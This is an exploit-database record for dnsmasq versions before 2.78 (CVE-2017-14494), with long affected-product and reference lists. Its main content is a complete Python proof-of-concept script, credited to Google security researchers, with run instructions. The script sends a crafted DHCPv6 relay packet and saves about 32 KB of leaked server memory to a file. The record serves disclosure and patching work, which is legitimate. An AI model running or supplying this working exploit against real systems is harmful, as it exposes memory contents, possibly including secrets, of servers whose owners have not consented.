ID

VAR-E-201710-0038


CVE

cve_id:CVE-2017-14494

Trust: 1.8

cve_id:CVE-2017-14495

Trust: 0.8

cve_id:CVE-2017-14493

Trust: 0.8

cve_id:CVE-2017-14492

Trust: 0.8

cve_id:CVE-2017-14496

Trust: 0.8

cve_id:CVE-2017-14491

Trust: 0.8

cve_id:CVE-2017-13704

Trust: 0.3

sources: BID: 101085 // PACKETSTORM: 144468 // PACKETSTORM: 144473 // PACKETSTORM: 144462 // PACKETSTORM: 144471 // PACKETSTORM: 144480 // PACKETSTORM: 144479 // EXPLOIT-DB: 42944

EDB ID

42944


TITLE

Dnsmasq < 2.78 - Information Leak - Multiple dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 42944

DESCRIPTION

Dnsmasq < 2.78 - Information Leak. CVE-2017-14494 . dos exploit for Multiple platform

Trust: 0.6

sources: EXPLOIT-DB: 42944

AFFECTED PRODUCTS

vendor:dnsmasqmodel: - scope:ltversion:2.78

Trust: 4.6

vendor:redhatmodel:enterprise linux server year extended update supportscope:eqversion:-47.4

Trust: 0.6

vendor:dnsmasqmodel:lack of freescope: - version: -

Trust: 0.5

vendor:dnsmasqmodel:stack-basedscope: - version: -

Trust: 0.5

vendor:dnsmasqmodel:integer underflowscope: - version: -

Trust: 0.5

vendor:dnsmasqmodel:information leakscope: - version: -

Trust: 0.5

vendor:dnsmasqmodel:2-byte heap-basedscope: - version: -

Trust: 0.5

vendor:dnsmasqmodel:heap-basedscope: - version: -

Trust: 0.5

vendor:ubuntumodel:linuxscope:eqversion:17.04

Trust: 0.3

vendor:ubuntumodel:linux ltsscope:eqversion:16.04

Trust: 0.3

vendor:ubuntumodel:linux ltsscope:eqversion:14.04

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:1.2.2

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.77

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.75

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.72

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.71

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.70

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.7

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.65

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.64

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.63

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.62

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.61

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.60

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.6

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.59

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.58

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.57

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.56

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.55

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.54

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.53

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.52

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.51

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.50

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.49

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.48

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.47

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.46

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.45

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.44

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.43

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.42

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.41

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.40

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.4

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.38

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.37

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.36

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.35

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.34

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.33

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.30

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.29

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.28

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.27

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.26

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.25

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.24

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.23

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.22

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.21

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.20

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.2

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.19

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.18

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.17

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.16

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.15

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.14

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.13

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.12

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.11

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:2.10

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:1.9

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:1.8

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:1.6

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:1.5

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:1.4

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:1.3

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:1.18

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:1.17

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:1.16

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:1.15

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:1.14

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:1.13

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:1.12

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:1.11

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:1.10

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:1.0

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:0.996

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:0.992

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:0.98

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:0.96

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:0.95

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:0.7

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:0.6

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:0.5

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:eqversion:0.4

Trust: 0.3

vendor:slackwaremodel:linuxscope:eqversion:14.2

Trust: 0.3

vendor:slackwaremodel:linuxscope:eqversion:14.1

Trust: 0.3

vendor:slackwaremodel:linuxscope:eqversion:14.0

Trust: 0.3

vendor:slackwaremodel:linuxscope:eqversion:13.37

Trust: 0.3

vendor:slackwaremodel:linuxscope:eqversion:13.1

Trust: 0.3

vendor:slackwaremodel:linuxscope:eqversion:13.0

Trust: 0.3

vendor:redhatmodel:enterprise linux workstation optionalscope:eqversion:7

Trust: 0.3

vendor:redhatmodel:enterprise linux workstation optionalscope:eqversion:6

Trust: 0.3

vendor:redhatmodel:enterprise linux workstationscope:eqversion:7

Trust: 0.3

vendor:redhatmodel:enterprise linux workstationscope:eqversion:6

Trust: 0.3

vendor:redhatmodel:enterprise linux server tusscope:eqversion:6.6

Trust: 0.3

vendor:redhatmodel:enterprise linux server tusscope:eqversion:6.5

Trust: 0.3

vendor:redhatmodel:enterprise linux server optional eusscope:eqversion:7.3

Trust: 0.3

vendor:redhatmodel:enterprise linux server optional eusscope:eqversion:7.2

Trust: 0.3

vendor:redhatmodel:enterprise linux server optional eusscope:eqversion:6.5

Trust: 0.3

vendor:redhatmodel:enterprise linux server optional ausscope:eqversion:6.6

Trust: 0.3

vendor:redhatmodel:enterprise linux server optional ausscope:eqversion:6.5

Trust: 0.3

vendor:redhatmodel:enterprise linux server optional ausscope:eqversion:6.4

Trust: 0.3

vendor:redhatmodel:enterprise linux server optionalscope:eqversion:7

Trust: 0.3

vendor:redhatmodel:enterprise linux server optionalscope:eqversion:6

Trust: 0.3

vendor:redhatmodel:enterprise linux server for armscope:eqversion:7

Trust: 0.3

vendor:redhatmodel:enterprise linux server eusscope:eqversion:7.3

Trust: 0.3

vendor:redhatmodel:enterprise linux server eusscope:eqversion:7.2

Trust: 0.3

vendor:redhatmodel:enterprise linux server ausscope:eqversion:6.6

Trust: 0.3

vendor:redhatmodel:enterprise linux server ausscope:eqversion:6.5

Trust: 0.3

vendor:redhatmodel:enterprise linux server ausscope:eqversion:6.4

Trust: 0.3

vendor:redhatmodel:enterprise linux server ausscope:eqversion:6.2

Trust: 0.3

vendor:redhatmodel:enterprise linux server tusscope:eqversion:-7.4

Trust: 0.3

vendor:redhatmodel:enterprise linux server tusscope:eqversion:-7.3

Trust: 0.3

vendor:redhatmodel:enterprise linux server tusscope:eqversion:-7.2

Trust: 0.3

vendor:redhatmodel:enterprise linux server extended update supportscope:eqversion:-7.4

Trust: 0.3

vendor:redhatmodel:enterprise linux server extended update supportscope:eqversion:-7.2

Trust: 0.3

vendor:redhatmodel:enterprise linux server extended update supporscope:eqversion:-7.3

Trust: 0.3

vendor:redhatmodel:enterprise linux server ausscope:eqversion:-7.4

Trust: 0.3

vendor:redhatmodel:enterprise linux server ausscope:eqversion:-7.3

Trust: 0.3

vendor:redhatmodel:enterprise linux server ausscope:eqversion:-7.2

Trust: 0.3

vendor:redhatmodel:enterprise linux server year extended update supportscope:eqversion:-47.2

Trust: 0.3

vendor:redhatmodel:enterprise linux server year extended updscope:eqversion:-47.3

Trust: 0.3

vendor:redhatmodel:enterprise linux serverscope:eqversion:7

Trust: 0.3

vendor:redhatmodel:enterprise linux serverscope:eqversion:6

Trust: 0.3

vendor:redhatmodel:enterprise linux serverscope:eqversion:5

Trust: 0.3

vendor:redhatmodel:enterprise linux long life serverscope:eqversion:5.9

Trust: 0.3

vendor:redhatmodel:enterprise linux hpc node optionalscope:eqversion:6

Trust: 0.3

vendor:redhatmodel:enterprise linux hpc nodescope:eqversion:6

Trust: 0.3

vendor:redhatmodel:enterprise linux for scientific computingscope:eqversion:7

Trust: 0.3

vendor:redhatmodel:enterprise linux for power little endian extended update suppscope:eqversion:-7.4

Trust: 0.3

vendor:redhatmodel:enterprise linux for power little endianscope:eqversion:7

Trust: 0.3

vendor:redhatmodel:enterprise linux for power big endian extended update supportscope:eqversion:-7.4

Trust: 0.3

vendor:redhatmodel:enterprise linux for power big endianscope:eqversion:7

Trust: 0.3

vendor:redhatmodel:enterprise linux for power little endian extended update supposcope:eqversion:-7.3

Trust: 0.3

vendor:redhatmodel:enterprise linux for power little endian extended update supposcope:eqversion:-7.2

Trust: 0.3

vendor:redhatmodel:enterprise linux for power big endian extended update supportscope:eqversion:-7.3

Trust: 0.3

vendor:redhatmodel:enterprise linux for power big endian extended update supportscope:eqversion:-7.2

Trust: 0.3

vendor:redhatmodel:enterprise linux for ibm z systems extended update supportscope:eqversion:-7.4

Trust: 0.3

vendor:redhatmodel:enterprise linux for ibm z systems extended update supportscope:eqversion:-7.3

Trust: 0.3

vendor:redhatmodel:enterprise linux for ibm z systems extended update supportscope:eqversion:-7.2

Trust: 0.3

vendor:redhatmodel:enterprise linux for ibm z systemsscope:eqversion:7

Trust: 0.3

vendor:redhatmodel:enterprise linux eus compute nodescope:eqversion:7.4

Trust: 0.3

vendor:redhatmodel:enterprise linux eus compute nodescope:eqversion:7.3

Trust: 0.3

vendor:redhatmodel:enterprise linux eus compute nodescope:eqversion:7.2

Trust: 0.3

vendor:redhatmodel:enterprise linux desktop optionalscope:eqversion:6

Trust: 0.3

vendor:redhatmodel:enterprise linux desktopscope:eqversion:7

Trust: 0.3

vendor:redhatmodel:enterprise linux desktopscope:eqversion:6

Trust: 0.3

vendor:redhatmodel:enterprise linux computenode optional eusscope:eqversion:7.3

Trust: 0.3

vendor:redhatmodel:enterprise linux computenode optional eusscope:eqversion:7.2

Trust: 0.3

vendor:redhatmodel:enterprise linux computenode optionalscope:eqversion:7

Trust: 0.3

vendor:redhatmodel:enterprise linux computenode eusscope:eqversion:7.3

Trust: 0.3

vendor:redhatmodel:enterprise linux computenode eusscope:eqversion:7.2

Trust: 0.3

vendor:redhatmodel:enterprise linux computenodescope:eqversion:7

Trust: 0.3

vendor:oraclemodel:linuxscope:eqversion:7

Trust: 0.3

vendor:oraclemodel:linuxscope:eqversion:6

Trust: 0.3

vendor:opensusemodel:leapscope:eqversion:42.3

Trust: 0.3

vendor:opensusemodel:leapscope:eqversion:42.2

Trust: 0.3

vendor:kubernetesmodel:kubernetesscope:eqversion:1.7.6

Trust: 0.3

vendor:kubernetesmodel:kubernetesscope:eqversion:1.7

Trust: 0.3

vendor:kubernetesmodel:kubernetesscope:eqversion:1.6.10

Trust: 0.3

vendor:kubernetesmodel:kubernetesscope:eqversion:1.6

Trust: 0.3

vendor:kubernetesmodel:kubernetesscope:eqversion:1.5.7

Trust: 0.3

vendor:kubernetesmodel:kubernetesscope:eqversion:1.5

Trust: 0.3

vendor:kubernetesmodel:kubernetesscope:eqversion:1.2

Trust: 0.3

vendor:googlemodel:androidscope:eqversion:7.1.1

Trust: 0.3

vendor:googlemodel:androidscope:eqversion:6.0.1

Trust: 0.3

vendor:googlemodel:androidscope:eqversion:5.1.1

Trust: 0.3

vendor:googlemodel:androidscope:eqversion:5.0.2

Trust: 0.3

vendor:googlemodel:androidscope:eqversion:4.4.4

Trust: 0.3

vendor:googlemodel:androidscope:eqversion:8.0

Trust: 0.3

vendor:googlemodel:androidscope:eqversion:7.1.2

Trust: 0.3

vendor:googlemodel:androidscope:eqversion:7.0

Trust: 0.3

vendor:googlemodel:androidscope:eqversion:6.0

Trust: 0.3

vendor:fedoraprojectmodel:fedorascope:eqversion:27

Trust: 0.3

vendor:debianmodel:linux sparcscope:eqversion:6.0

Trust: 0.3

vendor:debianmodel:linux s/390scope:eqversion:6.0

Trust: 0.3

vendor:debianmodel:linux powerpcscope:eqversion:6.0

Trust: 0.3

vendor:debianmodel:linux mipsscope:eqversion:6.0

Trust: 0.3

vendor:debianmodel:linux ia-64scope:eqversion:6.0

Trust: 0.3

vendor:debianmodel:linux ia-32scope:eqversion:6.0

Trust: 0.3

vendor:debianmodel:linux ia-30scope:eqversion:6.0

Trust: 0.3

vendor:debianmodel:linux armscope:eqversion:6.0

Trust: 0.3

vendor:debianmodel:linux amd64scope:eqversion:6.0

Trust: 0.3

vendor:centosmodel:centosscope:eqversion:7

Trust: 0.3

vendor:centosmodel:centosscope:eqversion:6

Trust: 0.3

vendor:thekelleysmodel:dnsmasqscope:neversion:2.78

Trust: 0.3

vendor:kubernetesmodel:kubernetesscope:neversion:1.8

Trust: 0.3

vendor:kubernetesmodel:kubernetesscope:neversion:1.7.7

Trust: 0.3

vendor:kubernetesmodel:kubernetesscope:neversion:1.6.11

Trust: 0.3

vendor:kubernetesmodel:kubernetesscope:neversion:1.5.8

Trust: 0.3

sources: BID: 101085 // PACKETSTORM: 144468 // PACKETSTORM: 144473 // PACKETSTORM: 144462 // PACKETSTORM: 144471 // PACKETSTORM: 144480 // PACKETSTORM: 144479 // EXPLOIT-DB: 42944 // EDBNET: 94654 // EDBNET: 94657 // EDBNET: 94656 // EDBNET: 94398 // EDBNET: 94655 // EDBNET: 94653

EXPLOIT

'''
Sources:
https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14494.py
https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html

Sadly, there are no easy docker setup instructions available.

Setup a simple network with dnsmasq as dhcpv6 server. Run any dhcpv6 client on the clients machine and obtain the network packets. Look for the server identifier inside the dhcpv6 packets. Then, run the poc on the client:
# python /poc.py <ipv6 addr> <server id, hexencoded>
The poc will create a response.bin file with 32k bytes worth of ram, beginning at the buffer + 38.

'''

#!/usr/bin/env python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Fermin J. Serna <fjserna@google.com>
# Felix Wilhelm <fwilhelm@google.com>
# Gabriel Campana <gbrl@google.com>
# Kevin Hamacher <hamacher@google.com>
# Gynvael Coldwind <gynvael@google.com>
# Ron Bowes - Xoogler :/
from binascii import unhexlify
from struct import pack
import socket
import sys

# num bytes to leak. < 0xFFFF, exact upper limit not tested.
N_BYTES = 0x8000

def send_packet(data, host, port):
print("[+] sending {} bytes to [{}]:{}".format(len(data), host, port))
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, socket.IPPROTO_UDP)

s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, len(data))
if s.sendto(data, (host, port)) != len(data):
print("[!] Could not send (full) payload")

s.close()

def u8(x):
return pack("B", x)

def u16(x):
return pack("!H", x)

def gen_option(option, data, length=None):
if length is None:
length = len(data)

return b"".join([
u16(option),
u16(length),
data
])

def inner_pkg(duid):
OPTION6_SERVER_ID = 2
return b"".join([
u8(5), # Type = DHCP6RENEW
u8(0), u16(1337), # ID
gen_option(OPTION6_SERVER_ID, duid),
gen_option(1, "", length=(N_BYTES - 8 - 18)) # Client ID
])

if __name__ == '__main__':
assert len(sys.argv) == 2, "{} <ip> <duid>".format(sys.argv[0])
# No automated way to obtain a duid, sorry. Not a programming contest after all.
host, duid = sys.argv[1:]
duid = unhexlify(duid)
assert len(duid) == 14
pkg = b"".join([
u8(12), # DHCP6RELAYFORW
'?',
# Client addr
'\xFD\x00',
'\x00\x00' * 6,
'\x00\x05',
'_' * (33 - 17), # Skip random data.
# Option 9 - OPTION6_RELAY_MSG
gen_option(9, inner_pkg(duid), length=N_BYTES),
])

# Setup receiving port
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, N_BYTES)
s.bind(('::', 547))

# Send request
send_packet(pkg, host, 547)

# Dump response
with open('response.bin', 'wb') as f:
f.write(s.recvfrom(N_BYTES)[0])

Trust: 1.0

sources: EXPLOIT-DB: 42944

EXPLOIT LANGUAGE

py

Trust: 0.6

sources: EXPLOIT-DB: 42944

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 42944

TYPE

Information Leak

Trust: 1.6

sources: EXPLOIT-DB: 42944 // EDBNET: 94398

TAGS

tag:exploit

Trust: 3.0

tag:overflow

Trust: 1.5

tag:denial of service

Trust: 0.5

tag:info disclosure

Trust: 0.5

sources: PACKETSTORM: 144468 // PACKETSTORM: 144473 // PACKETSTORM: 144462 // PACKETSTORM: 144471 // PACKETSTORM: 144480 // PACKETSTORM: 144479

CREDITS

Google Security Research

Trust: 0.6

sources: EXPLOIT-DB: 42944

EXTERNAL IDS

db:NVDid:CVE-2017-14494

Trust: 3.0

db:EXPLOIT-DBid:42944

Trust: 1.6

db:NVDid:CVE-2017-14495

Trust: 1.4

db:NVDid:CVE-2017-14493

Trust: 1.4

db:NVDid:CVE-2017-14492

Trust: 1.4

db:NVDid:CVE-2017-14496

Trust: 1.4

db:NVDid:CVE-2017-14491

Trust: 0.8

db:0DAYTODAYid:28724

Trust: 0.6

db:EDBNETid:94654

Trust: 0.6

db:0DAYTODAYid:28727

Trust: 0.6

db:EDBNETid:94657

Trust: 0.6

db:0DAYTODAYid:28726

Trust: 0.6

db:EDBNETid:94656

Trust: 0.6

db:EDBNETid:94398

Trust: 0.6

db:0DAYTODAYid:28725

Trust: 0.6

db:EDBNETid:94655

Trust: 0.6

db:0DAYTODAYid:28723

Trust: 0.6

db:EDBNETid:94653

Trust: 0.6

db:PACKETSTORMid:144468

Trust: 0.5

db:PACKETSTORMid:144473

Trust: 0.5

db:PACKETSTORMid:144462

Trust: 0.5

db:PACKETSTORMid:144471

Trust: 0.5

db:PACKETSTORMid:144480

Trust: 0.5

db:PACKETSTORMid:144479

Trust: 0.5

db:NVDid:CVE-2017-13704

Trust: 0.3

db:CERT/CCid:VU#973527

Trust: 0.3

db:ICS CERTid:ICSA-17-332-01

Trust: 0.3

db:BIDid:101085

Trust: 0.3

sources: BID: 101085 // PACKETSTORM: 144468 // PACKETSTORM: 144473 // PACKETSTORM: 144462 // PACKETSTORM: 144471 // PACKETSTORM: 144480 // PACKETSTORM: 144479 // EXPLOIT-DB: 42944 // EDBNET: 94654 // EDBNET: 94657 // EDBNET: 94656 // EDBNET: 94398 // EDBNET: 94655 // EDBNET: 94653

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2017-14494

Trust: 1.5

url:https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/cve-2017-14494.py

Trust: 1.0

url:https://0day.today/exploits/28724

Trust: 0.6

url:https://0day.today/exploits/28727

Trust: 0.6

url:https://0day.today/exploits/28726

Trust: 0.6

url:https://www.exploit-db.com/exploits/42944/

Trust: 0.6

url:https://0day.today/exploits/28725

Trust: 0.6

url:https://0day.today/exploits/28723

Trust: 0.6

url:https://nvd.nist.gov/vuln/detail/cve-2017-14495

Trust: 0.5

url:https://nvd.nist.gov/vuln/detail/cve-2017-14493

Trust: 0.5

url:https://nvd.nist.gov/vuln/detail/cve-2017-14496

Trust: 0.5

url:https://nvd.nist.gov/vuln/detail/cve-2017-14491

Trust: 0.5

url:https://nvd.nist.gov/vuln/detail/cve-2017-14492

Trust: 0.5

url:https://github.com/google/security-research-pocs/blob/master/vulnerabilities/dnsmasq/cve-2017-14492.py

Trust: 0.3

url:https://access.redhat.com/security/cve/cve-2017-14495

Trust: 0.3

url:https://github.com/google/security-research-pocs/blob/master/vulnerabilities/dnsmasq/cve-2017-14494.py

Trust: 0.3

url:https://access.redhat.com/errata/rhsa-2017:2836

Trust: 0.3

url:https://access.redhat.com/security/cve/cve-2017-14491

Trust: 0.3

url:https://source.android.com/security/bulletin/2017-10-01

Trust: 0.3

url:https://ics-cert.us-cert.gov/advisories/icsa-17-332-01

Trust: 0.3

url:https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html

Trust: 0.3

url:https://bugzilla.redhat.com/show_bug.cgi?id=1495411

Trust: 0.3

url:https://bugzilla.redhat.com/show_bug.cgi?id=1495510

Trust: 0.3

url:https://access.redhat.com/security/cve/cve-2017-14494

Trust: 0.3

url:https://github.com/google/security-research-pocs/blob/master/vulnerabilities/dnsmasq/cve-2017-14496.py

Trust: 0.3

url:https://bugzilla.redhat.com/show_bug.cgi?id=1495409 bug 1495409

Trust: 0.3

url:http://www.kb.cert.org/vuls/id/973527

Trust: 0.3

url:https://bugzilla.redhat.com/show_bug.cgi?id=1495410

Trust: 0.3

url:https://www.debian.org/security/2017/dsa-3989

Trust: 0.3

url:https://access.redhat.com/security/cve/cve-2017-13704

Trust: 0.3

url:https://access.redhat.com/security/cve/cve-2017-14492

Trust: 0.3

url:https://bugzilla.redhat.com/show_bug.cgi?id=1495416

Trust: 0.3

url:https://access.redhat.com/security/cve/cve-2017-14496

Trust: 0.3

url:https://bugzilla.redhat.com/show_bug.cgi?id=1495415

Trust: 0.3

url:http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.601472

Trust: 0.3

url:https://access.redhat.com/security/cve/cve-2017-14493

Trust: 0.3

url:https://github.com/google/security-research-pocs/blob/master/vulnerabilities/dnsmasq/cve-2017-14493.py

Trust: 0.3

url:https://github.com/google/security-research-pocs/blob/master/vulnerabilities/dnsmasq/cve-2017-14491.py

Trust: 0.3

url:http://www.thekelleys.org.uk/dnsmasq/doc.html

Trust: 0.3

url:https://bugzilla.redhat.com/show_bug.cgi?id=1495412

Trust: 0.3

url:https://access.redhat.com/errata/rhsa-2017:2837

Trust: 0.3

url:http://www.thekelleys.org.uk/dnsmasq/changelog

Trust: 0.3

url:https://github.com/google/security-research-pocs/blob/master/vulnerabilities/dnsmasq/cve-2017-14495.py

Trust: 0.3

url:https://github.com/kubernetes/kubernetes/blob/master/changelog.md

Trust: 0.3

sources: BID: 101085 // PACKETSTORM: 144468 // PACKETSTORM: 144473 // PACKETSTORM: 144462 // PACKETSTORM: 144471 // PACKETSTORM: 144480 // PACKETSTORM: 144479 // EXPLOIT-DB: 42944 // EDBNET: 94654 // EDBNET: 94657 // EDBNET: 94656 // EDBNET: 94398 // EDBNET: 94655 // EDBNET: 94653

SOURCES

db:BIDid:101085
db:PACKETSTORMid:144468
db:PACKETSTORMid:144473
db:PACKETSTORMid:144462
db:PACKETSTORMid:144471
db:PACKETSTORMid:144480
db:PACKETSTORMid:144479
db:EXPLOIT-DBid:42944
db:EDBNETid:94654
db:EDBNETid:94657
db:EDBNETid:94656
db:EDBNETid:94398
db:EDBNETid:94655
db:EDBNETid:94653

LAST UPDATE DATE

2024-03-21T15:11:49.924000+00:00


SOURCES UPDATE DATE

db:BIDid:101085date:2017-10-02T00:00:00

SOURCES RELEASE DATE

db:BIDid:101085date:2017-10-02T00:00:00
db:PACKETSTORMid:144468date:2017-10-02T05:22:22
db:PACKETSTORMid:144473date:2017-10-02T10:01:11
db:PACKETSTORMid:144462date:2017-10-02T03:33:33
db:PACKETSTORMid:144471date:2017-10-02T08:32:22
db:PACKETSTORMid:144480date:2017-10-02T16:22:22
db:PACKETSTORMid:144479date:2017-10-02T14:44:44
db:EXPLOIT-DBid:42944date:2017-10-02T00:00:00
db:EDBNETid:94654date:2017-10-13T00:00:00
db:EDBNETid:94657date:2017-10-13T00:00:00
db:EDBNETid:94656date:2017-10-13T00:00:00
db:EDBNETid:94398date:2017-10-02T00:00:00
db:EDBNETid:94655date:2017-10-13T00:00:00
db:EDBNETid:94653date:2017-10-13T00:00:00